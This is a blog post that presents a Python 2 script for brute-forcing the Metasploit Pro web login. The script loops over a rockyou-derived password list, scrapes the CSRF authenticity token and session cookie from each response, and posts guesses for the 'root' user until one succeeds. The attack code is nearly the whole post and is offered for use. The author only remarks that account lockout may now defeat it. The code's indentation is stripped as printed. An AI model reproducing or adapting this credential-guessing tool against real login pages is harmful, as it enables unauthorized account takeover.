Saturday, May 16, 2015

Old Python Script to Brute-Force Metasploit Pro Web Interface

I wrote this python script to brute force a login to Metasploit Pro.  I doubt that it works for the current release because I believe they added a login threshold of 10 failed logins and it locks the account.

#!/usr/bin/python
import httplib
fpasswords = open('modRockyou.txt')
for password in fpasswords:
f = open('getResponse.txt','w')
conn = httplib.HTTPSConnection("127.0.0.1:3790")
conn.request("GET", "/login")
#conn.request("POST", "/user_sessions", postParam)
r1 = conn.getresponse()
f.write(r1.read())
f.close()
f = open('getResponse.txt')
for line in f:
if "authenticity_token" in line:
auth_token = line[193:237] # Pulls the authenticity token out of the GET request
#print "----"
#print line[193:237]
#print auth_token
#print " "
f.close()
header = r1.getheaders()
#print header
header2 = dict(r1.getheaders())
if header2.has_key('set-cookie'):
#print header2['set-cookie']
#print " "
ui_session_raw = header2['set-cookie']
ui_session =  ui_session_raw[0:234]
# Now that I have the authenticity_token from the GET response and the ui_session cookie I can send the post back into the server
#postParam = "utf8=%E2%9C%93&authenticity_token=hydDI8OCWE533edVJma3%2BJgVJUKOaqB1GNEL7XN9rq8%3D&user_session%5Busername%5D=root&user_session%5Bpassword%5D=mypassword&commit=Sign+in"

postParam = "utf8=%E2%9C%93&authenticity_token=" + auth_token + "&user_session%5Busername%5D=root&user_session%5Bpassword%5D=" + password.rstrip() + "&commit=Sign+in"
#_ui_session=BAh7CEkiD3Nlc3Npb25faWQGOgZFRkkiJThjZGZjMmMzNzRiMWUwOTQ2MjI3MmRjYzQyMWYwMWRjBjsAVEkiEF9jc3JmX3Rva2VuBjsARkkiMVVVT2NJalRNZVlIS2tTQzhEc1R5U1kySHZUVHd1WWdOUVRaWlpnWmw3VW89BjsARkkiCmZsYXNoBjsARm86JUFjdGlvbkRpc3BhdGNoOjpGbGFzaDo6Rmxhc2hIYXNoCToKQHVzZWRvOghTZXQGOgpAaGFzaHsGOgplcnJvclQ6DEBjbG9zZWRGOg1AZmxhc2hlc3sGOwpJIiJJbnZhbGlkIHVzZXJuYW1lIG9yIHBhc3N3b3JkLgY7AEY6CUBub3cw--7ae6ffe189f3e025db7546e5e17552acc1e80201
headers = {"Cookie" : ui_session}
#print postParam
#print ' '
#print headers
#print ' '
conn.request("POST", "/user_sessions", postParam, headers)
r2 = conn.getresponse()
header3 = r2.getheaders()
#print header3
#print ' '
print password
#print ' '
header4 = dict(r2.getheaders())
user_cred_raw = header4['set-cookie']
if "user_credentials" in user_cred_raw:
info = "Login was successful with password " + password
print info
exit(0)
conn.close()
conn.close()
fpasswords.close()

at
Labels: , ,

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)

Test Authentication from Linux Console using python3 pexpect

Working with the IT420 lab, you will discover that we need to discover a vulnerable user account.  The following python3 script uses the pex...